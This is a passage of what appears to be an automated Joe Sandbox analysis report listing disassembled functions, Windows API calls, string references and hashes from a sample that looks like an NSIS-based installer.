Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 1a5139e6078aa1fdd5380d113510ef6b25ff983d9f8c9825e1a42f9c65a41b23
Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
Opcode Fuzzy Hash: 1a5139e6078aa1fdd5380d113510ef6b25ff983d9f8c9825e1a42f9c65a41b23
Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

Function 00403C55 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
ShowWindow.USER32(?), ref: 00403CAE
DestroyWindow.USER32 ref: 00403CC2
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
GetDlgItem.USER32(?,?), ref: 00403CFF
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
IsWindowEnabled.USER32(00000000), ref: 00403D1A
GetDlgItem.USER32(?,?), ref: 00403DC8
GetDlgItem.USER32(?,00000002), ref: 00403DD2
SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403E3D
GetDlgItem.USER32(?,00000003), ref: 00403EE3
ShowWindow.USER32(00000000,?), ref: 00403F04
EnableWindow.USER32(?,?), ref: 00403F16
EnableWindow.USER32(?,?), ref: 00403F31
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403F47
EnableMenuItem.USER32(00000000), ref: 00403F4E
SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F66
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
ShowWindow.USER32(?,0000000A), ref: 004040EA

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 1926e66dbe86b771c32413573697ed931c6ac126e5224ec9b851fb9904e66452
Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
Opcode Fuzzy Hash: 1926e66dbe86b771c32413573697ed931c6ac126e5224ec9b851fb9904e66452
Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

Function 004038B2 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 216stringregistrylibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

lstrcatW.KERNEL32(00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800,74DF3420,00000000,00434000), ref: 00403933
lstrlenW.KERNEL32(00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800), ref: 004039B3
lstrcmpiW.KERNEL32(00427178,.exe,00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
GetFileAttributesW.KERNEL32(00427180), ref: 004039D1
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00434800), ref: 00403A1A

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

RegisterClassW.USER32(00428180), ref: 00403A57
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
ShowWindow.USER32(00000005,00000000), ref: 00403ADA
LoadLibraryW.KERNEL32(RichEd20), ref: 00403AEB
LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
RegisterClassW.USER32(00428180), ref: 00403B1C
DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B

Strings

RichEd32, xrefs: 00403AF1
.exe, xrefs: 004039C0
Control Panel\Desktop\ResourceLocale, xrefs: 004038E6
RichEd20, xrefs: 00403AE6
RichEdit, xrefs: 00403B0D
RichEdit20W, xrefs: 00403AFE, 00403B04
.DEFAULT\Control Panel\International, xrefs: 0040391E
_Nb, xrefs: 00403A36, 00403A9E

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 914957316-1115850852
Opcode ID: 8e4e2db869f3f3991819afcb55c59cc8f3ae99e000e4feef3646a4c772ef4b1b
Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
Opcode Fuzzy Hash: 8e4e2db869f3f3991819afcb55c59cc8f3ae99e000e4feef3646a4c772ef4b1b
Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

Function 004042CA Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 00404368
GetDlgItem.USER32(?,000003E8), ref: 0040437C
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404399
GetSysColor.USER32(?), ref: 004043AA
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
lstrlenW.KERNEL32(?), ref: 004043CB
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
GetDlgItem.USER32(?,0000040A), ref: 00404446
SendMessageW.USER32(00000000), ref: 0040444D
GetDlgItem.USER32(?,000003E8), ref: 00404478
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
SetCursor.USER32(00000000), ref: 004044CC
ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,?), ref: 004044E1
LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
SetCursor.USER32(00000000), ref: 004044F0
SendMessageW.USER32(00000111,?,00000000), ref: 0040451F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531

Strings

N, xrefs: 00404466
open, xrefs: 004044D9
AB@, xrefs: 004044D6

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: AB@$N$open
API String ID: 3615053054-4108209771
Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9

Function 00405C06 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAA,?,?,?,00405922,?,00000000,000000F1,?), ref: 00405C16
CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,00405DAA,?,?,?,00405922,?,00000000,000000F1,?), ref: 00405C3A
GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43

Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
wsprintfA.USER32 ref: 00405C7E
GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
GlobalFree.KERNEL32(00000000), ref: 00405D6F
CloseHandle.KERNEL32(00000000), ref: 00405D76

Part of subcall function 00405B54: GetFileAttributesW.KERNEL32(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A

Strings

p]B, xrefs: 00405C0B
%ls=%ls, xrefs: 00405C74
[Rename], xrefs: 00405CE8, 00405CFA
NUL, xrefs: 00405C10
peB, xrefs: 00405C55

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %ls=%ls$NUL$[Rename]$p]B$peB
API String ID: 1265525490-3322868524
Opcode ID: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
Opcode Fuzzy Hash: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5

Function 004045C8 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 269stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404617
SetWindowTextW.USER32(00000000,?), ref: 00404641
SHBrowseForFolderW.SHELL32(?), ref: 004046F2
CoTaskMemFree.OLE32(00000000), ref: 004046FD
lstrcmpiW.KERNEL32(00427180,004226D0,00000000,?,?), ref: 0040472F
lstrcatW.KERNEL32(?,00427180), ref: 0040473B
SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D

Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403330,00436800,74DF3420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403330,00436800,74DF3420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403330,00436800,74DF3420,00403510), ref: 00406206

GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF

Strings

A, xrefs: 004046EB

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A
API String ID: 2246997448-3554254475
Opcode ID: 9279281f82fbc7aa84ca95c74a32d54f8e3848aa2d1259afc6b0fcaac2342789
Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
Opcode Fuzzy Hash: 9279281f82fbc7aa84ca95c74a32d54f8e3848aa2d1259afc6b0fcaac2342789
Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69

Function 00402DBA Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402DCE
GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEA

Part of subcall function 00405B54: GetFileAttributesW.KERNEL32(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E33
GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7A

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
soft, xrefs: 00402EAA
Null, xrefs: 00402EB3
Inst, xrefs: 00402EA1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
Error launching installer, xrefs: 00402E0A

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-787788815
Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C

Function 00405F0A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 207stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00405FCD
GetSystemDirectoryW.KERNEL32(00427180,00000400), ref: 0040604B
GetWindowsDirectoryW.KERNEL32(00427180,00000400), ref: 0040605E
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
SHGetPathFromIDListW.SHELL32(?,00427180), ref: 004060A8
CoTaskMemFree.OLE32(?), ref: 004060B3
lstrcatW.KERNEL32(00427180,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
lstrlenW.KERNEL32(00427180,00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00406131

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406019
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D1

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-730719616
Opcode ID: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
Opcode Fuzzy Hash: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

Function 00404194 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004041B1
GetSysColor.USER32(00000000), ref: 004041CD
SetTextColor.GDI32(?,00000000), ref: 004041D9
SetBkMode.GDI32(?,?), ref: 004041E5
GetSysColor.USER32(?), ref: 004041F8
SetBkColor.GDI32(?,?), ref: 00404208
DeleteObject.GDI32(?), ref: 00404222
CreateBrushIndirect.GDI32(?), ref: 0040422C

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25

Function 00402571 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402614
SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402637
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040264D

Part of subcall function 00405BD7: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Strings

9, xrefs: 004025BC

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: File$ByteCharMultiReadWide$Pointerwsprintf
String ID: 9
API String ID: 1149667376-2366072709
Opcode ID: 4b1c8a58dd33f7fe7e15ef8117ed1000f91cb8bfb35d653e6135ad7849d4d288
Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
Opcode Fuzzy Hash: 4b1c8a58dd33f7fe7e15ef8117ed1000f91cb8bfb35d653e6135ad7849d4d288
Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69

Function 004027B3 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
GlobalFree.KERNEL32(00000000), ref: 00402875
CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9

Function 00405192 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

